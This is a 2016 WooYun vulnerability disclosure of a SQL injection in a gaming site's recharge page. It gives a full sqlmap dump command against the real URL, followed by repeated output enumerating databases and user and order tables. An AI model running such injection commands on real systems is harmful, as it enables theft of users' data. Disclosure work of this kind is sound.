当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191990

漏洞标题:紫金岛某站SQL注入POST可垮裤(泄露千万订单信息+用户信息)

相关厂商:91zjd.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-03 11:29

修复时间:2016-04-08 11:30

公开时间:2016-04-08 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
可垮裤查询

详细说明:

注入点:F:\sqlmap>sqlmap.py -u "http://www.10000kl.com/recharge/yeepay_recharge.asp" --d
ata "account=1&againaccount=1&DropDownList1=5&txtyzm=7061&immediately_rech=%C1%A
2%BC%B4%B3%E4%D6%B5&BankType=" -D QPGameUserDB -T UserMemberOrder -C "GameID" --
dump


数据库20个

available databases [20]:
[*] DB_BACKUP
[*] master
[*] model
[*] msdb
[*] QPGameBSTEST
[*] QPGameDB
[*] QPGameHFDB
[*] QPGameJDDB
[*] QPGameTYDB
[*] QPGameUserDB
[*] QPPromotionDB
[*] QPServerInfoDB_NEW
[*] QPTreasureDB
[*] QPTreasureMatchDB
[*] QPWebGameDB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZJD_OM_DB
[*] ZjdGameWebDB


当前库:QPGameUserDB
表信息

Database: QPGameUserDB
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.View_UserALLLogo_bySpid | 134579282 |
| dbo.View_UserALLLogo_bySpid | 134579282 |
| dbo.UserMemberOrder | 12001899 |
| dbo.View_UserFristLogo | 8479404 |
| dbo.View_VWUserFristLogo | 8363283 |
| dbo.View_UserLogoNew | 8083116 |
| dbo.View_UserLogoNew | 8083116 |
| dbo.GoldEggsLog2012 | 3307940 |
| dbo.IndividualDatumScore | 2352809 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.Yjt_accounts | 500000 |
| dbo.DailyLogonPrize | 458638 |
| dbo.View_CZK_TG | 357416 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.ShortUrlLink | 178294 |
| dbo.accountsinfo20110101 | 117381 |
| dbo.QQcdkey | 99694 |
| dbo.IndividualDatumFirend | 78305 |
| dbo.AccountsInfo0821 | 76835 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.View_Rechargeable_Card_tg | 14173 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.GameIdentifier | 10001 |
| dbo.UserWincountlogo | 8250 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp2 | 4774 |
| dbo.AccountsInfo1121 | 4569 |
| dbo.dxuserall | 3148 |
| dbo.dxuserall | 3148 |
| dbo.SystemStreamInfo | 2508 |
| dbo.AccountsInfo_regtj | 2435 |
| dbo.View_AccountsInfo_regtjNew | 2435 |
| dbo.View_AccountsInfo_regtjNew | 2435 |
| dbo.GameUserBang_TYBLogo | 2358 |
| dbo.tempUsername | 2079 |
| dbo.dxUserbak | 1651 |
| dbo.GameUserBang_abestLogo | 1465 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.AccountsInfobak | 736 |
| dbo.IndividualDatumbak | 550 |
| dbo.IndividualDatumbak | 550 |
| dbo.PK_SOURCE_IP_POOL | 541 |
| dbo.LuckUser | 393 |
| dbo.AccountsInfo_xt | 352 |
| dbo.UserAddScoreLogo | 325 |
| dbo.VW_Charge_List | 300 |
| dbo.dxuserlist | 209 |
| dbo.S3_Tmp | 156 |
| dbo.GameUserBang_New_tyb | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.View_t1 | 47 |
| dbo.test_0801 | 46 |
| dbo.tempcity | 41 |
| dbo.we | 35 |
| dbo.View_t320 | 29 |
| dbo.comd_list | 26 |
| dbo.ConfineContent | 26 |
| dbo.PK_GameDownloadCount | 19 |
| dbo.View_t500 | 17 |
| dbo.View_t310 | 14 |
| dbo.D99_Tmp | 10 |
| dbo.D99_CMD | 5 |
| dbo.ConfineAddress | 3 |
| dbo.PK_WebPage_Click_Count | 3 |
| dbo.SystemStatusInfo | 2 |
| dbo.D99_REG | 1 |
| dbo.DIY_TEMPCOMMAND_TABLE | 1 |
+----------------------------------+---------+


垮裤查询

Database: QPGameBSTEST
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.RecordUserEnter | 814 |
| dbo.RecordUserLeave | 567 |
| dbo.View_Report_Match | 113 |
| dbo.GameScoreLocker | 14 |
| dbo.SystemStreamInfo | 9 |
+-----------------------+---------+


数据k

Database: QPGameDB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.RecordUserEnter | 229582 |
| dbo.RecordUserLeave | 226490 |
| dbo.View_Report_Match | 28687 |
| dbo.GameScoreInfo1020 | 17587 |
| dbo.GameScoreInfo1020 | 17587 |
| dbo.GameScoreInfoLogo1020 | 15885 |
| dbo.GameScoreInfoLogo_tyb | 10335 |
| dbo.GameScoreInfoLogo_tyb | 10335 |
| dbo.GameScoreInfo_tyb | 9086 |
| dbo.GameScoreInfo_tyb | 9086 |
| dbo.GameScoreInfo1127 | 2048 |
| dbo.GameScoreInfo1124 | 1946 |
| dbo.GameScoreInfoLogo1127 | 1926 |
| dbo.GameScoreInfo1123 | 1827 |
| dbo.GameScoreInfo0118 | 1596 |
| dbo.GameScoreInfo1121 | 1123 |
| dbo.GameScoreInfoLogo1220 | 825 |
| dbo.SystemStreamInfo | 779 |
| dbo.GameScoreInfo1201 | 544 |
| dbo.GameScoreInfoLogo1204 | 535 |
| dbo.GameScoreInfo1130 | 505 |
| dbo.GameScoreInfo1209 | 304 |
| dbo.GameScoreInfo120802 | 303 |
| dbo.GameScoreInfo120802 | 303 |
| dbo.GameScoreLocker | 88 |
+---------------------------+---------+


数据库QPWebGameDB

Database: QPWebGameDB
[178 tables]
+------------------------------+
| BBSGOOD_IP_2008 |
| BBSGOOD_IP_2008 |
| BBSGOOD_IP_2010 |
| BBSGOOD_IP_2012 |
| BBSGOOD_IP_20130320_Source |
| Cmcc_RRep_logo |
| Cmcc_RTo_mylogo |
| Cmcc_Rep_logo |
| Cmcc_To_mylogo |
| DIY_TEMPCOMMAND_TABLE |
| Exchange_Mobile |
| GAME_ASSOCIATOR |
| GAME_PRIZE |
| GameChargeOrder |
| GameInfo |
| GameSoreEXLog |
| Game_data |
| HN_TEL_USERS_LIUYAN |
| HN_TEL_USERS_LIUYAN |
| ManageLoginInfo |
| PLAYTIME_ONLINE0302 |
| PLAYTIME_ONLINE0302 |
| PLAYTIME_ONLINE0427 |
| QP_GAMETEST |
| SP_IPLIST |
| SpUserlist_no10 |
| SpUserlist_no10 |
| TESTTABLE |
| T_GIFTLIST |
| T_PCDandan |
| T_RegUserCZTJ |
| T_RegUserTJ1 |
| T_RegUserTJ1 |
| T_USERGIFTLOGO |
| T_UserRechargeRecord |
| T_UserVipExchange_bak |
| T_UserVipExchange_bak |
| T_dayreport_zjd |
| T_dayreport_zjdtemp |
| TaskListPlaza |
| TaskUserLogo |
| TeamUser_power |
| Team_info |
| Team_power |
| UserLiveLogo_sp |
| UserLiveLogo_sp |
| User_FindPwdLogo |
| User_MatchLogo |
| ViewT_AllUserPayGoldEggs |
| ViewT_DayReport_CMCC1 |
| ViewT_DayReport_CMCC1 |
| ViewT_DayReport_CTC |
| ViewT_DayReport_Net |
| ViewT_DayReport_Taobao |
| ViewT_GoldEggsLog |
| ViewT_MatchGUOQING320 |
| ViewT_MatchGUOQING320 |
| ViewT_MonthReport_CMCC1 |
| ViewT_MonthReport_CMCC1 |
| ViewT_MonthReport_Net |
| ViewT_MonthReport_Taobao |
| ViewT_REGTEST12 |
| ViewT_REGTEST12 |
| ViewT_UserScore |
| View_1 |
| View_700_Score |
| View_AllRegUser_New |
| View_AllRegUser_New |
| View_AllRegUser_SP1 |
| View_AllRegUser_SP1 |
| View_AllUserPayGoldEggsbak |
| View_AllUserPayGoldEggsbak |
| View_All_AndroUser |
| View_DayOnline |
| View_DayReportALL_Taobao |
| View_DayReportAll_CMCC1 |
| View_DayReportAll_CMCC1 |
| View_DayReportAll_Net |
| View_DayReport_ALL1 |
| View_DayReport_ALL1 |
| View_DayReport_CMCC1 |
| View_DayReport_CMCC1 |
| View_DayReport_CTC |
| View_DayReport_ISLAND |
| View_DayReport_LDYS |
| View_DayReport_Net |
| View_DayReport_Taobao |
| View_DayReport_UNICOM |
| View_DayReport_ZZSP |
| View_Day_Gold |
| View_GameScoreLockerNew |
| View_GameScoreLockerNew |
| View_MonthOnline |
| View_MonthReportAll_CMCC1 |
| View_MonthReportAll_CMCC1 |
| View_MonthReportAll_Net |
| View_MonthReportAll_Taobao |
| View_MonthReport_ALL1 |
| View_MonthReport_ALL1 |
| View_MonthReport_CMCC1 |
| View_MonthReport_CMCC1 |
| View_MonthReport_CTC |
| View_MonthReport_CTCSP |
| View_MonthReport_ISLAND |
| View_MonthReport_LDYS |
| View_MonthReport_Net_SZF |
| View_MonthReport_Net_SZF |
| View_MonthReport_Net_Yeepay |
| View_MonthReport_Taobao |
| View_MonthReport_UNICOM |
| View_MonthReport_Voice |
| View_MonthReport_ZZSP |
| View_MonthSQNumReport |
| View_MonthVipReport |
| View_MonthVipSQZFReport |
| View_Month_GameScoreInfoLogo |
| View_MonthzfResult |
| View_PayGoldEggs |
| View_REGtest1 |
| View_REGtest1 |
| View_RecordUserEnter_Today |
| View_RecordUserEnter_Today |
| View_RecordUserLeave |
| View_Room_ForAndro |
| View_SpreaderUser_Counts |
| View_SpreaderUser_Counts |
| View_UserGameRecord |
| View_UserLive0 |
| View_UserScore |
| View_UserZZTJ |
| View_VIP_thisMonthUnpaly |
| View_VIP_tisMonth |
| View_WBGiftList_0 |
| View_WBGiftList_0 |
| View_WeekOnline |
| View_Week_PM |
| View_teamGift |
| View_tel_users |
| View_testtemp |
| View_time_dimension_Month |
| View_tuanduitest |
| WBCARDLOGO |
| WBList_card |
| WBList_card |
| WCRTEMP00001 |
| mytestip |
| sms_black_list |
| sms_net_tj21310 |
| sms_taobao_tj21310 |
| sms_tj21310 |
| t_Net_CZLog |
| t_Net_KQLog_ForTG |
| t_Net_KQLog_ForTG |
| t_Report_AreaPlayCounts |
| t_Report_AreaRegCounts |
| t_Report_AreaUIDPlayCounts |
| t_UserBug |
| t_Vnet_YZLog |
| t_cz_ForTB |
| test_UserDB |
| time_dimension |
| ut_Accounts_Pmdj |
| ut_Accounts_Spreader |
| ut_AreaCityCode |
| ut_Class_AddQB |
| ut_Client_Msg |
| ut_GameCountByTime |
| ut_News |
| ut_Online_Users |
| ut_Product_Shop |
| ut_Statistics_SysScore |
| ut_User_PList |
| ut_cmcc_trj_ForTG |
| ut_cmcc_trj_ForTG |
| ut_cztj_zjd |
| viewt_regnosp |
| vnetone_TempOrder |
| vnetone_sms_TempOrder |
+------------------------------+


漏洞证明:

注入点:F:\sqlmap>sqlmap.py -u "http://www.10000kl.com/recharge/yeepay_recharge.asp" --d
ata "account=1&againaccount=1&DropDownList1=5&txtyzm=7061&immediately_rech=%C1%A
2%BC%B4%B3%E4%D6%B5&BankType=" -D QPGameUserDB -T UserMemberOrder -C "GameID" --
dump


数据库20个

available databases [20]:
[*] DB_BACKUP
[*] master
[*] model
[*] msdb
[*] QPGameBSTEST
[*] QPGameDB
[*] QPGameHFDB
[*] QPGameJDDB
[*] QPGameTYDB
[*] QPGameUserDB
[*] QPPromotionDB
[*] QPServerInfoDB_NEW
[*] QPTreasureDB
[*] QPTreasureMatchDB
[*] QPWebGameDB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZJD_OM_DB
[*] ZjdGameWebDB


当前库:QPGameUserDB
表信息

Database: QPGameUserDB
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.View_UserALLLogo_bySpid | 134579282 |
| dbo.View_UserALLLogo_bySpid | 134579282 |
| dbo.UserMemberOrder | 12001899 |
| dbo.View_UserFristLogo | 8479404 |
| dbo.View_VWUserFristLogo | 8363283 |
| dbo.View_UserLogoNew | 8083116 |
| dbo.View_UserLogoNew | 8083116 |
| dbo.GoldEggsLog2012 | 3307940 |
| dbo.IndividualDatumScore | 2352809 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.Yjt_accounts | 500000 |
| dbo.DailyLogonPrize | 458638 |
| dbo.View_CZK_TG | 357416 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.ShortUrlLink | 178294 |
| dbo.accountsinfo20110101 | 117381 |
| dbo.QQcdkey | 99694 |
| dbo.IndividualDatumFirend | 78305 |
| dbo.AccountsInfo0821 | 76835 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.View_Rechargeable_Card_tg | 14173 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.GameIdentifier | 10001 |
| dbo.UserWincountlogo | 8250 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp2 | 4774 |
| dbo.AccountsInfo1121 | 4569 |
| dbo.dxuserall | 3148 |
| dbo.dxuserall | 3148 |
| dbo.SystemStreamInfo | 2508 |
| dbo.AccountsInfo_regtj | 2435 |
| dbo.View_AccountsInfo_regtjNew | 2435 |
| dbo.View_AccountsInfo_regtjNew | 2435 |
| dbo.GameUserBang_TYBLogo | 2358 |
| dbo.tempUsername | 2079 |
| dbo.dxUserbak | 1651 |
| dbo.GameUserBang_abestLogo | 1465 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.AccountsInfobak | 736 |
| dbo.IndividualDatumbak | 550 |
| dbo.IndividualDatumbak | 550 |
| dbo.PK_SOURCE_IP_POOL | 541 |
| dbo.LuckUser | 393 |
| dbo.AccountsInfo_xt | 352 |
| dbo.UserAddScoreLogo | 325 |
| dbo.VW_Charge_List | 300 |
| dbo.dxuserlist | 209 |
| dbo.S3_Tmp | 156 |
| dbo.GameUserBang_New_tyb | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.View_t1 | 47 |
| dbo.test_0801 | 46 |
| dbo.tempcity | 41 |
| dbo.we | 35 |
| dbo.View_t320 | 29 |
| dbo.comd_list | 26 |
| dbo.ConfineContent | 26 |
| dbo.PK_GameDownloadCount | 19 |
| dbo.View_t500 | 17 |
| dbo.View_t310 | 14 |
| dbo.D99_Tmp | 10 |
| dbo.D99_CMD | 5 |
| dbo.ConfineAddress | 3 |
| dbo.PK_WebPage_Click_Count | 3 |
| dbo.SystemStatusInfo | 2 |
| dbo.D99_REG | 1 |
| dbo.DIY_TEMPCOMMAND_TABLE | 1 |
+----------------------------------+---------+


垮裤查询

Database: QPGameBSTEST
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.RecordUserEnter | 814 |
| dbo.RecordUserLeave | 567 |
| dbo.View_Report_Match | 113 |
| dbo.GameScoreLocker | 14 |
| dbo.SystemStreamInfo | 9 |
+-----------------------+---------+


数据k

Database: QPGameDB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.RecordUserEnter | 229582 |
| dbo.RecordUserLeave | 226490 |
| dbo.View_Report_Match | 28687 |
| dbo.GameScoreInfo1020 | 17587 |
| dbo.GameScoreInfo1020 | 17587 |
| dbo.GameScoreInfoLogo1020 | 15885 |
| dbo.GameScoreInfoLogo_tyb | 10335 |
| dbo.GameScoreInfoLogo_tyb | 10335 |
| dbo.GameScoreInfo_tyb | 9086 |
| dbo.GameScoreInfo_tyb | 9086 |
| dbo.GameScoreInfo1127 | 2048 |
| dbo.GameScoreInfo1124 | 1946 |
| dbo.GameScoreInfoLogo1127 | 1926 |
| dbo.GameScoreInfo1123 | 1827 |
| dbo.GameScoreInfo0118 | 1596 |
| dbo.GameScoreInfo1121 | 1123 |
| dbo.GameScoreInfoLogo1220 | 825 |
| dbo.SystemStreamInfo | 779 |
| dbo.GameScoreInfo1201 | 544 |
| dbo.GameScoreInfoLogo1204 | 535 |
| dbo.GameScoreInfo1130 | 505 |
| dbo.GameScoreInfo1209 | 304 |
| dbo.GameScoreInfo120802 | 303 |
| dbo.GameScoreInfo120802 | 303 |
| dbo.GameScoreLocker | 88 |
+---------------------------+---------+


数据库QPWebGameDB

Database: QPWebGameDB
[178 tables]
+------------------------------+
| BBSGOOD_IP_2008 |
| BBSGOOD_IP_2008 |
| BBSGOOD_IP_2010 |
| BBSGOOD_IP_2012 |
| BBSGOOD_IP_20130320_Source |
| Cmcc_RRep_logo |
| Cmcc_RTo_mylogo |
| Cmcc_Rep_logo |
| Cmcc_To_mylogo |
| DIY_TEMPCOMMAND_TABLE |
| Exchange_Mobile |
| GAME_ASSOCIATOR |
| GAME_PRIZE |
| GameChargeOrder |
| GameInfo |
| GameSoreEXLog |
| Game_data |
| HN_TEL_USERS_LIUYAN |
| HN_TEL_USERS_LIUYAN |
| ManageLoginInfo |
| PLAYTIME_ONLINE0302 |
| PLAYTIME_ONLINE0302 |
| PLAYTIME_ONLINE0427 |
| QP_GAMETEST |
| SP_IPLIST |
| SpUserlist_no10 |
| SpUserlist_no10 |
| TESTTABLE |
| T_GIFTLIST |
| T_PCDandan |
| T_RegUserCZTJ |
| T_RegUserTJ1 |
| T_RegUserTJ1 |
| T_USERGIFTLOGO |
| T_UserRechargeRecord |
| T_UserVipExchange_bak |
| T_UserVipExchange_bak |
| T_dayreport_zjd |
| T_dayreport_zjdtemp |
| TaskListPlaza |
| TaskUserLogo |
| TeamUser_power |
| Team_info |
| Team_power |
| UserLiveLogo_sp |
| UserLiveLogo_sp |
| User_FindPwdLogo |
| User_MatchLogo |
| ViewT_AllUserPayGoldEggs |
| ViewT_DayReport_CMCC1 |
| ViewT_DayReport_CMCC1 |
| ViewT_DayReport_CTC |
| ViewT_DayReport_Net |
| ViewT_DayReport_Taobao |
| ViewT_GoldEggsLog |
| ViewT_MatchGUOQING320 |
| ViewT_MatchGUOQING320 |
| ViewT_MonthReport_CMCC1 |
| ViewT_MonthReport_CMCC1 |
| ViewT_MonthReport_Net |
| ViewT_MonthReport_Taobao |
| ViewT_REGTEST12 |
| ViewT_REGTEST12 |
| ViewT_UserScore |
| View_1 |
| View_700_Score |
| View_AllRegUser_New |
| View_AllRegUser_New |
| View_AllRegUser_SP1 |
| View_AllRegUser_SP1 |
| View_AllUserPayGoldEggsbak |
| View_AllUserPayGoldEggsbak |
| View_All_AndroUser |
| View_DayOnline |
| View_DayReportALL_Taobao |
| View_DayReportAll_CMCC1 |
| View_DayReportAll_CMCC1 |
| View_DayReportAll_Net |
| View_DayReport_ALL1 |
| View_DayReport_ALL1 |
| View_DayReport_CMCC1 |
| View_DayReport_CMCC1 |
| View_DayReport_CTC |
| View_DayReport_ISLAND |
| View_DayReport_LDYS |
| View_DayReport_Net |
| View_DayReport_Taobao |
| View_DayReport_UNICOM |
| View_DayReport_ZZSP |
| View_Day_Gold |
| View_GameScoreLockerNew |
| View_GameScoreLockerNew |
| View_MonthOnline |
| View_MonthReportAll_CMCC1 |
| View_MonthReportAll_CMCC1 |
| View_MonthReportAll_Net |
| View_MonthReportAll_Taobao |
| View_MonthReport_ALL1 |
| View_MonthReport_ALL1 |
| View_MonthReport_CMCC1 |
| View_MonthReport_CMCC1 |
| View_MonthReport_CTC |
| View_MonthReport_CTCSP |
| View_MonthReport_ISLAND |
| View_MonthReport_LDYS |
| View_MonthReport_Net_SZF |
| View_MonthReport_Net_SZF |
| View_MonthReport_Net_Yeepay |
| View_MonthReport_Taobao |
| View_MonthReport_UNICOM |
| View_MonthReport_Voice |
| View_MonthReport_ZZSP |
| View_MonthSQNumReport |
| View_MonthVipReport |
| View_MonthVipSQZFReport |
| View_Month_GameScoreInfoLogo |
| View_MonthzfResult |
| View_PayGoldEggs |
| View_REGtest1 |
| View_REGtest1 |
| View_RecordUserEnter_Today |
| View_RecordUserEnter_Today |
| View_RecordUserLeave |
| View_Room_ForAndro |
| View_SpreaderUser_Counts |
| View_SpreaderUser_Counts |
| View_UserGameRecord |
| View_UserLive0 |
| View_UserScore |
| View_UserZZTJ |
| View_VIP_thisMonthUnpaly |
| View_VIP_tisMonth |
| View_WBGiftList_0 |
| View_WBGiftList_0 |
| View_WeekOnline |
| View_Week_PM |
| View_teamGift |
| View_tel_users |
| View_testtemp |
| View_time_dimension_Month |
| View_tuanduitest |
| WBCARDLOGO |
| WBList_card |
| WBList_card |
| WCRTEMP00001 |
| mytestip |
| sms_black_list |
| sms_net_tj21310 |
| sms_taobao_tj21310 |
| sms_tj21310 |
| t_Net_CZLog |
| t_Net_KQLog_ForTG |
| t_Net_KQLog_ForTG |
| t_Report_AreaPlayCounts |
| t_Report_AreaRegCounts |
| t_Report_AreaUIDPlayCounts |
| t_UserBug |
| t_Vnet_YZLog |
| t_cz_ForTB |
| test_UserDB |
| time_dimension |
| ut_Accounts_Pmdj |
| ut_Accounts_Spreader |
| ut_AreaCityCode |
| ut_Class_AddQB |
| ut_Client_Msg |
| ut_GameCountByTime |
| ut_News |
| ut_Online_Users |
| ut_Product_Shop |
| ut_Statistics_SysScore |
| ut_User_PList |
| ut_cmcc_trj_ForTG |
| ut_cmcc_trj_ForTG |
| ut_cztj_zjd |
| viewt_regnosp |
| vnetone_TempOrder |
| vnetone_sms_TempOrder |
+------------------------------+


修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-08 11:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无